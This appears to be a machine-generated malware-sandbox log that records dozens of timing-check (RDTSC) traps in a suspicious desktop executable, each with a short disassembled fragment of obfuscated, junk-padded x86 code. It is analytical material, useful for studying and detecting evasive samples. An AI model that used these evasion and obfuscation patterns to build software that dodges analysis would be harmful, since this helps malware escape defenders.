Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AC3790 second address: AC3796 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AC3796 second address: AC37B8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD0B534805Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FD0B534805Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AC37B8 second address: AC37C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FD0B5483366h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AC37C2 second address: AC37C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AC383B second address: AC3876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0B5483372h 0x00000009 popad 0x0000000a jmp 00007FD0B5483375h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push ecx 0x00000013 jbe 00007FD0B5483366h 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AC3876 second address: AC388E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jbe 00007FD0B5348060h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AC985F second address: AC9870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B548336Ch 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AC9B1C second address: AC9B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0B5348066h 0x00000009 pop edi 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AC9B3A second address: AC9B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FD0B5483366h 0x0000000d jmp 00007FD0B5483379h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AC9CC5 second address: AC9CE1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FD0B5348065h 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A5849D second address: A584A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A584A1 second address: A584A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A584A7 second address: A584B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD0B548336Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A584B8 second address: A584BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD4AE1 second address: AD4B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push esi 0x00000008 jg 00007FD0B5483366h 0x0000000e jmp 00007FD0B5483370h 0x00000013 pop esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jno 00007FD0B5483366h 0x0000001e jmp 00007FD0B5483371h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD4B1D second address: AD4B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD4B24 second address: AD4B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD4B2A second address: AD4B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD4B2E second address: AD4B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD4C8C second address: AD4C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD50CF second address: AD50FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483373h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007FD0B5483373h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD50FD second address: AD5103 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD5103 second address: AD514C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483377h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jc 00007FD0B548336Ch 0x00000010 je 00007FD0B5483366h 0x00000016 jnp 00007FD0B5483372h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD0B548336Bh 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD514C second address: AD5150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD5577 second address: AD5588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0B548336Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD5588 second address: AD559C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnc 00007FD0B5348056h 0x0000000b pop esi 0x0000000c jc 00007FD0B534805Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD5741 second address: AD576A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B548336Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD0B548336Ch 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jp 00007FD0B5483366h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD5898 second address: AD589C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD589C second address: AD58C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FD0B548337Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD58C2 second address: AD58D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0B534805Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD58D2 second address: AD58D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD58D6 second address: AD58E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FD0B5348056h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD482D second address: AD4835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD7B43 second address: AD7B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AD7B47 second address: AD7B59 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD0B5483366h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: ADD189 second address: ADD194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: ADD44C second address: ADD454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: ADD454 second address: ADD460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD0B5348056h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: ADD460 second address: ADD465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA47BE second address: AA47C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA4BB6 second address: 8EEDD4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD0B5483368h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edx, dword ptr [ebp+122D2ECCh] 0x00000013 sub dword ptr [ebp+122D2A5Dh], edx 0x00000019 push dword ptr [ebp+122D10E1h] 0x0000001f mov ecx, dword ptr [ebp+122D1B0Ch] 0x00000025 call dword ptr [ebp+122D1808h] 0x0000002b pushad 0x0000002c jp 00007FD0B548336Eh 0x00000032 jl 00007FD0B5483368h 0x00000038 xor eax, eax 0x0000003a xor dword ptr [ebp+122D2A06h], edi 0x00000040 mov edx, dword ptr [esp+28h] 0x00000044 mov dword ptr [ebp+122D2A06h], esi 0x0000004a mov dword ptr [ebp+122D2D0Ch], eax 0x00000050 jmp 00007FD0B5483372h 0x00000055 mov esi, 0000003Ch 0x0000005a stc 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f mov dword ptr [ebp+122D1928h], ecx 0x00000065 lodsw 0x00000067 cmc 0x00000068 add eax, dword ptr [esp+24h] 0x0000006c mov dword ptr [ebp+122D18A2h], edx 0x00000072 mov dword ptr [ebp+122D1928h], edi 0x00000078 mov ebx, dword ptr [esp+24h] 0x0000007c jo 00007FD0B548336Ch 0x00000082 mov dword ptr [ebp+122D1928h], edx 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b push eax 0x0000008c push edx 0x0000008d push ebx 0x0000008e pop ebx 0x0000008f rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA4C5F second address: AA4C71 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FD0B5348056h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA4C71 second address: 8EEDD4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD0B5483366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c sub dword ptr [ebp+12461520h], edx 0x00000012 push dword ptr [ebp+122D10E1h] 0x00000018 mov di, 1861h 0x0000001c call dword ptr [ebp+122D1808h] 0x00000022 pushad 0x00000023 jp 00007FD0B548336Eh 0x00000029 jl 00007FD0B5483368h 0x0000002f pushad 0x00000030 popad 0x00000031 xor eax, eax 0x00000033 xor dword ptr [ebp+122D2A06h], edi 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d mov dword ptr [ebp+122D2A06h], esi 0x00000043 mov dword ptr [ebp+122D2D0Ch], eax 0x00000049 jmp 00007FD0B5483372h 0x0000004e mov esi, 0000003Ch 0x00000053 stc 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 mov dword ptr [ebp+122D1928h], ecx 0x0000005e lodsw 0x00000060 cmc 0x00000061 add eax, dword ptr [esp+24h] 0x00000065 mov dword ptr [ebp+122D18A2h], edx 0x0000006b mov dword ptr [ebp+122D1928h], edi 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 jo 00007FD0B548336Ch 0x0000007b mov dword ptr [ebp+122D1928h], edx 0x00000081 push eax 0x00000082 push eax 0x00000083 push edx 0x00000084 push eax 0x00000085 push edx 0x00000086 push ebx 0x00000087 pop ebx 0x00000088 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA4D07 second address: AA4D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA4D0B second address: AA4D26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0B5483377h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA4D26 second address: AA4D60 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 2C20C430h 0x00000013 mov ecx, dword ptr [ebp+122D234Ch] 0x00000019 mov dword ptr [ebp+122D200Ah], esi 0x0000001f push 451966A5h 0x00000024 pushad 0x00000025 jmp 00007FD0B5348061h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA515C second address: AA516F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FD0B5483368h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA5111 second address: AA515C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FD0B5348058h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov edx, dword ptr [ebp+122D1886h] 0x0000002d mov edi, dword ptr [ebp+122D2F33h] 0x00000033 push 00000004h 0x00000035 add edi, dword ptr [ebp+122D2D98h] 0x0000003b nop 0x0000003c push edi 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA595B second address: AA59CE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FD0B5483368h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov ecx, dword ptr [ebp+122D213Ch] 0x0000002a lea eax, dword ptr [ebp+1248954Ch] 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007FD0B5483368h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a jbe 00007FD0B548336Bh 0x00000050 mov ecx, 7424BC5Ch 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jns 00007FD0B5483368h 0x0000005e rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA59CE second address: AA59D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA59D4 second address: AA59D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA59D8 second address: A81488 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FD0B5348058h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 lea eax, dword ptr [ebp+12489508h] 0x0000002f xor edx, 09F80EACh 0x00000035 push eax 0x00000036 jbe 00007FD0B5348060h 0x0000003c pushad 0x0000003d jl 00007FD0B5348056h 0x00000043 push edx 0x00000044 pop edx 0x00000045 popad 0x00000046 mov dword ptr [esp], eax 0x00000049 mov dword ptr [ebp+122D191Eh], ecx 0x0000004f call dword ptr [ebp+122D3A25h] 0x00000055 pushad 0x00000056 jmp 00007FD0B5348063h 0x0000005b push edi 0x0000005c push ebx 0x0000005d pop ebx 0x0000005e pop edi 0x0000005f popad 0x00000060 push esi 0x00000061 jnp 00007FD0B534805Ch 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AE210F second address: AE2113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AE2113 second address: AE2117 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AE2117 second address: AE2144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD0B548336Bh 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 jmp 00007FD0B5483370h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A6276A second address: A62793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jns 00007FD0B5348056h 0x0000000f ja 00007FD0B5348056h 0x00000015 pop edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 jmp 00007FD0B534805Dh 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A62793 second address: A62799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AE5627 second address: AE5648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD0B5348066h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AE5648 second address: AE564C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AE564C second address: AE5652 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AE8BD6 second address: AE8BDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AE8BDA second address: AE8BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AE8682 second address: AE8686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AE8686 second address: AE8695 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD0B5348056h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AF13DA second address: AF13EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B548336Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AF13EE second address: AF1402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0B534805Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AF1402 second address: AF1406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AF1406 second address: AF1460 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0B5348056h 0x00000008 jmp 00007FD0B5348064h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FD0B5348066h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ebx 0x0000001b pushad 0x0000001c jl 00007FD0B5348056h 0x00000022 jmp 00007FD0B5348066h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AF1701 second address: AF1705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA537C second address: AA53E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD0B5348069h 0x00000008 jmp 00007FD0B5348068h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov edx, 37250AE1h 0x00000018 mov ecx, dword ptr [ebp+122D2BACh] 0x0000001e mov ebx, dword ptr [ebp+12489547h] 0x00000024 mov dword ptr [ebp+122D17E2h], esi 0x0000002a add eax, ebx 0x0000002c mov dword ptr [ebp+1244DD8Bh], ebx 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jbe 00007FD0B534805Ch 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA53E0 second address: AA53E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA53E4 second address: AA5480 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348062h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FD0B5348058h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push eax 0x00000027 movsx edi, bx 0x0000002a pop edi 0x0000002b push 00000004h 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007FD0B5348058h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 mov ecx, 7A4F079Ah 0x0000004c nop 0x0000004d jmp 00007FD0B5348065h 0x00000052 push eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007FD0B5348065h 0x0000005b rdtsc
